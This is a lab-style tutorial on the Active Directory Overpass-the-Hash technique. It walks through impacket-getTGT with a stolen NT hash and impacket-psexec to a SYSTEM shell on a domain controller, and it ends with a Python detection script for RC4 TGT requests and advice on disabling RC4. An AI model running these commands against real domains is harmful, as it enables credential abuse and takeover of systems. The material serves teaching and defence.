June 2, 2026
Active Directory Attacks — OverPass The Hash
Osec
Overpass-the-Hash is a post-exploitation technique in Active Directory environments where an attacker uses an NTLM hash to obtain a Kerberos ticket, instead of authenticating directly with NTLM. It allows an attacker to take an NTLM hash and use it to request a Kerberos TGT from the domain controller.
Kerberos offers 4 different key types: DES, RC4, AES-128 and AES-256.
When attackers know the RC4 key (which is in fact the user's NT hash), and when the RC4 etype is not disabled, they can use it to obtain Kerberos tickets.
Attack
Attack flow:
- Credential Dumping: The attacker gains administrative privileges on a local machine and extracts the NT hash of a specific user or service account from memory (LSASS) or disk (NTDS.dit).
- Authentication Request: Instead of performing a standard NTLM challenge-response, the attacker uses an offensive tool (like Mimikatz) to present the stolen hash to the Kerberos Key Distribution Center (KDC) requesting a Ticket-Granting Ticket (TGT).
- KDC Validation: The KDC validates the pre-authentication data encrypted with the user's hash.
- Ticket Issuance: The KDC returns a valid TGT to the attacker, treating the transaction exactly as if the user had supplied the original password.
- Lateral Movement: The attacker stores this TGT in the current session's memory and proceeds with Pass-the-Ticket operations, requesting Ticket-Granting Service (TGS) tickets to access restricted network resources on behalf of the compromised identity.
For the demo, let's assume that we already have the NTLM hash for the domain user BRoss (e.g. obtained by dumping LSASS memory).
From our Linux attacking machine:
NTLM hash → used as RC4 key → request TGT → save as .ccache → use Kerberos (-k)
Before doing anything with Kerberos we must set the system clock to match the domain controller (KDC); Kerberos rejects requests whose timestamp drifts beyond the allowed clock skew (5 minutes by default).
sudo ntpdate -u 10.129.202.146

Requesting a TGT:

impacket-getTGT INLANEFREIGHT.LOCAL/BRoss -hashes :49a074a39dd0651f647e765c2cc794c7 -dc-ip 10.129.202.146
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in BRoss.ccache

Tell Linux to use that ticket:

export KRB5CCNAME=/tmp/BRoss.ccache

Verify:
┌──(kolio㉿localhost)-[/tmp]
└─$ klist
Ticket cache: FILE:/tmp/BRoss.ccache
Default principal: BRoss@INLANEFREIGHT.LOCAL
Valid starting       Expires              Service principal
03/26/2026 17:11:58  03/27/2026 03:11:58  krbtgt/INLANEFREIGHT.LOCAL@INLANEFREIGHT.LOCAL
        renew until 03/27/2026 17:11:58

Use the ticket:
impacket-psexec -k -no-pass INLANEFREIGHT.LOCAL/BRoss@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Found writable share ADMIN$
[*] Uploading file FaCJDxae.exe
[*] Opening SVCManager on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Creating service gZGY on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Starting service gZGY.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
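The TGT request above is made with nothing but the NT hash, so the client can only offer the RC4 etype, and the domain controller records that choice in Windows Security event 4768 (TicketEncryptionType 0x17). The following Python is added here as an example and is not part of the original post: it triages constructed 4768-shaped records for RC4 TGT requests, where the supported_etypes field stands in for an assumed lookup of each account's msDS-SupportedEncryptionTypes attribute.

```python
"""Triage Windows Security event 4768 (TGT requested) for Overpass-the-Hash:
a hash-only client can only use the RC4 etype (0x17), so an RC4 TGT issued
for an account that holds AES keys stands out. Sample data is constructed."""
from dataclasses import dataclass

ETYPE_RC4_HMAC = 0x17                               # 4768 TicketEncryptionType for RC4-HMAC
SET_RC4, SET_AES128, SET_AES256 = 0x4, 0x8, 0x10    # msDS-SupportedEncryptionTypes bits

@dataclass(frozen=True)
class TgtRequest:
    target_user: str       # 4768 TargetUserName
    ip_address: str        # 4768 IpAddress (requesting host)
    ticket_etype: int      # 4768 TicketEncryptionType
    status: str            # 4768 Status; "0x0" means the TGT was issued
    supported_etypes: int  # the account's msDS-SupportedEncryptionTypes (assumed fetched from AD)

# Constructed sample: a normal AES logon, a hash-based RC4 request, an RC4 request
# for an account that only has RC4 keys, and an RC4 request the KDC rejected (0x18).
SAMPLE_EVENTS = [
    TgtRequest("jdoe", "10.0.0.21", 0x12, "0x0", SET_RC4 | SET_AES128 | SET_AES256),
    TgtRequest("BRoss", "10.0.0.99", ETYPE_RC4_HMAC, "0x0", SET_RC4 | SET_AES128 | SET_AES256),
    TgtRequest("legacy_svc", "10.0.0.40", ETYPE_RC4_HMAC, "0x0", SET_RC4),
    TgtRequest("BRoss", "10.0.0.99", ETYPE_RC4_HMAC, "0x18", SET_RC4 | SET_AES128 | SET_AES256),
]

def classify(ev: TgtRequest):
    """Return a finding label for a suspicious TGT request, else None."""
    if ev.ticket_etype != ETYPE_RC4_HMAC:
        return None                    # AES requests are the expected baseline
    if ev.status != "0x0":
        return "rc4_preauth_failed"    # repeated failures from one host deserve a look
    if ev.supported_etypes & (SET_AES128 | SET_AES256):
        # A password-based Windows client would have negotiated AES for this
        # account; an RC4-only request points at a client that holds just the hash.
        return "rc4_tgt_for_aes_capable_account"
    return "rc4_tgt_legacy_account"    # lower priority, but RC4 should be retired here

def triage(events):
    """Group suspicious requests by (host, user) so one noisy host stands out."""
    findings = {}
    for ev in events:
        label = classify(ev)
        if label:
            findings.setdefault((ev.ip_address, ev.target_user), []).append(label)
    return findings

if __name__ == "__main__":
    for (host, user), labels in triage(SAMPLE_EVENTS).items():
        print(f"{host:<12} {user:<12} {', '.join(labels)}")
```

Legacy hosts can legitimately negotiate RC4, so treat the output as a triage list to correlate with the source host rather than a verdict. Disabling the RC4 etype for the account or domain-wide removes the precondition the technique depends on.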